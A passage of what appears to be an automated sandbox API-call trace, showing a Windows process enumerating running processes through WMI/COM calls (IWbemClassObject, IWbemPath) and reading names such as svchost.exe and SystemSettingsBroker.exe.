WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0264.356] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.356] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0264.356] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0264.356] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.356] IWbemClassObject:Get (in: This=0x6a0258, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23c7e90*=0, plFlavor=0x23c7e94*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="svchost.exe", varVal2=0x0), pType=0x23c7e90*=8, plFlavor=0x23c7e94*=0) returned 0x0 [0264.356] SysStringByteLen (bstr="svchost.exe") returned 0x16 [0264.357] SysStringByteLen (bstr="svchost.exe") returned 0x16 [0264.357] IWbemClassObject:Get (in: This=0x6a0258, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23c7e90*=8, plFlavor=0x23c7e94*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="svchost.exe", varVal2=0x0), pType=0x23c7e90*=8, plFlavor=0x23c7e94*=0) returned 0x0 [0264.357] SysStringByteLen (bstr="svchost.exe") returned 0x16 [0264.357] SysStringByteLen (bstr="svchost.exe") returned 0x16 [0264.357] CoTaskMemAlloc (cb=0x4) returned 0x54ba238 [0264.357] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba238, puReturned=0x23c1fd0 | out: apObjects=0x54ba238*=0x5515cc0, puReturned=0x23c1fd0*=0x1) returned 0x0 [0264.418] IUnknown:QueryInterface (in: This=0x5515cc0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x5515cc0) returned 0x0 [0264.418] IUnknown:QueryInterface (in: This=0x5515cc0, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0264.418] IUnknown:QueryInterface (in: This=0x5515cc0, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0264.418] IUnknown:QueryInterface (in: This=0x5515cc0, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0264.418] IUnknown:AddRef (This=0x5515cc0) returned 0x3 [0264.418] IUnknown:QueryInterface (in: This=0x5515cc0, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0264.418] IUnknown:QueryInterface (in: This=0x5515cc0, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0264.418] IUnknown:QueryInterface (in: This=0x5515cc0, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x5515cc4) returned 0x0 [0264.419] IMarshal:GetUnmarshalClass (in: This=0x5515cc4, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0264.419] IUnknown:Release (This=0x5515cc4) returned 0x3 [0264.419] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0264.419] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0264.419] IUnknown:QueryInterface (in: This=0x5515cc0, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0264.419] IUnknown:Release (This=0x5515cc0) returned 0x2 [0264.419] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0264.419] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0264.419] IUnknown:QueryInterface (in: This=0x5515cc0, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x5515cc0) returned 0x0 [0264.419] IUnknown:AddRef (This=0x5515cc0) returned 0x4 [0264.419] IUnknown:Release (This=0x5515cc0) returned 0x3 [0264.419] IUnknown:Release (This=0x5515cc0) returned 0x2 [0264.419] CoTaskMemFree (pv=0x54ba238) [0264.419] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0264.419] IUnknown:AddRef (This=0x5515cc0) returned 0x3 [0264.419] IWbemClassObject:Get (in: This=0x5515cc0, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0264.419] IWbemClassObject:Get (in: This=0x5515cc0, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3812\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0264.420] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3812\"") returned 0x5e [0264.420] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3812\"") returned 0x5e [0264.420] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0264.420] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0264.420] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0264.420] IUnknown:Release (This=0x601a94) returned 0x1 [0264.421] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba388) returned 0x0 [0264.421] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba388, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0264.421] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba388, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5514968) returned 0x0 [0264.421] WbemDefPath:IUnknown:Release (This=0x54ba388) returned 0x0 [0264.421] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514968, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5514968) returned 0x0 [0264.421] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514968, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0264.422] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514968, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0264.422] WbemDefPath:IUnknown:AddRef (This=0x5514968) returned 0x3 [0264.422] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514968, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0264.422] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514968, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0264.422] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514968, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5514360) returned 0x0 [0264.422] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5514360, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0264.422] WbemDefPath:IUnknown:Release (This=0x5514360) returned 0x3 [0264.422] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0264.422] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0264.422] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514968, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0264.422] WbemDefPath:IUnknown:Release (This=0x5514968) returned 0x2 [0264.422] WbemDefPath:IUnknown:Release (This=0x5514968) returned 0x1 [0264.422] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0264.422] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0264.422] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514968, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5514968) returned 0x0 [0264.422] WbemDefPath:IUnknown:AddRef (This=0x5514968) returned 0x3 [0264.422] WbemDefPath:IUnknown:Release (This=0x5514968) returned 0x2 [0264.423] WbemDefPath:IWbemPath:SetText (This=0x5514968, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3812\"") returned 0x0 [0264.423] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0264.423] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0264.423] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.423] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0264.423] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0264.423] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.423] IWbemClassObject:Get (in: This=0x5515cc0, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23c871c*=0, plFlavor=0x23c8720*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SystemSettingsBroker.exe", varVal2=0x0), pType=0x23c871c*=8, plFlavor=0x23c8720*=0) returned 0x0 [0264.423] SysStringByteLen (bstr="SystemSettingsBroker.exe") returned 0x30 [0264.423] SysStringByteLen (bstr="SystemSettingsBroker.exe") returned 0x30 [0264.423] IWbemClassObject:Get (in: This=0x5515cc0, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23c871c*=8, plFlavor=0x23c8720*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SystemSettingsBroker.exe", varVal2=0x0), pType=0x23c871c*=8, plFlavor=0x23c8720*=0) returned 0x0 [0264.423] SysStringByteLen (bstr="SystemSettingsBroker.exe") returned 0x30 [0264.423] SysStringByteLen (bstr="SystemSettingsBroker.exe") returned 0x30 [0264.423] CoTaskMemAlloc (cb=0x4) returned 0x54ba238 [0264.423] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba238, puReturned=0x23c1fd0 | out: apObjects=0x54ba238*=0x550d580, puReturned=0x23c1fd0*=0x1) returned 0x0 [0264.424] IUnknown:QueryInterface (in: This=0x550d580, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x550d580) returned 0x0 [0264.424] IUnknown:QueryInterface (in: This=0x550d580, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0264.424] IUnknown:QueryInterface (in: This=0x550d580, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0264.425] IUnknown:QueryInterface (in: This=0x550d580, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0264.425] IUnknown:AddRef (This=0x550d580) returned 0x3 [0264.425] IUnknown:QueryInterface (in: This=0x550d580, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0264.425] IUnknown:QueryInterface (in: This=0x550d580, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0264.425] IUnknown:QueryInterface (in: This=0x550d580, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x550d584) returned 0x0 [0264.425] IMarshal:GetUnmarshalClass (in: This=0x550d584, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0264.425] IUnknown:Release (This=0x550d584) returned 0x3 [0264.425] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0264.425] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0264.425] IUnknown:QueryInterface (in: This=0x550d580, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0264.425] IUnknown:Release (This=0x550d580) returned 0x2 [0264.425] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0264.425] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0264.425] IUnknown:QueryInterface (in: This=0x550d580, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x550d580) returned 0x0 [0264.425] IUnknown:AddRef (This=0x550d580) returned 0x4 [0264.425] IUnknown:Release (This=0x550d580) returned 0x3 [0264.425] IUnknown:Release (This=0x550d580) returned 0x2 [0264.425] CoTaskMemFree (pv=0x54ba238) [0264.425] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0264.426] IUnknown:AddRef (This=0x550d580) returned 0x3 [0264.426] IWbemClassObject:Get (in: This=0x550d580, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0264.426] IWbemClassObject:Get (in: This=0x550d580, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"2376\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0264.426] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"2376\"") returned 0x5e [0264.426] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"2376\"") returned 0x5e [0264.426] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0264.426] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0264.426] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0264.426] IUnknown:Release (This=0x601a94) returned 0x1 [0264.428] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba388) returned 0x0 [0264.428] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba388, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0264.428] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba388, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x55146c8) returned 0x0 [0264.428] WbemDefPath:IUnknown:Release (This=0x54ba388) returned 0x0 [0264.429] WbemDefPath:IUnknown:QueryInterface (in: This=0x55146c8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x55146c8) returned 0x0 [0264.429] WbemDefPath:IUnknown:QueryInterface (in: This=0x55146c8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0264.429] WbemDefPath:IUnknown:QueryInterface (in: This=0x55146c8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0264.429] WbemDefPath:IUnknown:AddRef (This=0x55146c8) returned 0x3 [0264.429] WbemDefPath:IUnknown:QueryInterface (in: This=0x55146c8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0264.429] WbemDefPath:IUnknown:QueryInterface (in: This=0x55146c8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0264.429] WbemDefPath:IUnknown:QueryInterface (in: This=0x55146c8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, 